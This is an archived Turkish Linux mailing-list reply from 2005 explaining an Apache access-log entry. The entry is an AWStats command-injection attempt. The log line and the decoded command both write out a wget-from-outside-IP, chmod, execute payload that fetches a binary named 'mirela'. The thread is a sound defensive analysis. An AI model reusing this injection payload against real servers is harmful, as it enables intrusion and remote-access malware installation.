Re: [Linux] Acces_log girdisi

---------

New Message Reply About this list Date view Thread view Subject view Author view Attachment view

From: N.Ersen SISECI (siseci@acikkod.org)
Date: Fri 30 Dec 2005 - 17:01:47 EET


Selamlar,

Evet son satirda bir saldiri var.

Awstats da n kaynaklanan bir bug i kullanarak bi seyler yapmayi denemis
85.47.41.122 IP sini kullanan kisi.

echo; echo YYY; cd /tmp;wget 209.136.48.69/mirela; chmod +x
mirela; ./mirela; echo YYY; echo

komuyunu calistirmis.

Bu mirela programi sizin sunucunuzda bir socket aciyor ve ona disardan
baglanilmasina imkan sagliyor olabilir.

Google da wget + mirela diye aratirsaniz bir cok link var bu konuda.

Iyi calismalar dilerim.

N. Ersen SISECI
EnderUNIX Donem Lideri
http://www.enderunix.org

Bugun ipucu okudunuz mu?
http://ipucu.enderunix.org

Cum, 2005-12-30 tarihinde 14:38 +0000 saatinde, Ali Metin yazdı:
> 64.233.44.234 - - [30/Dec/2005:16:25:43 +0200] "HEAD
> http://www.sun.com/ HTTP/1.0" 403 - "-" "Mozilla/5.0 ( Windows; U;
> Windows 2003; DigiExt )
> 67.22.128.104 - - [30/Dec/2005:12:33:51 +0200] "GET
> http://login.yahoo.com HTTP/1.0" 403 3931 "-" "-"
> 85.47.41.122 - - [29/Dec/2005:05:14:08 +0200]
> "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget
> %20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%
> 2fmirela;echo%20YYY;echo| HTTP/1.1" 404 297 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
>
>
>
> Apache access loglarinda yukaridaki satirlar var. Ne manaya geliyor?
> Son satirda bir saldiri var di mi?
>
>
> _______________________________________________
> Linux mailing list
> Linux@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux

_______________________________________________
Linux mailing list
Linux@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux


New Message Reply About this list Date view Thread view Subject view Author view Attachment view

---------

Bu arsiv hypermail 2.1.2 tarafindan uretilmistir.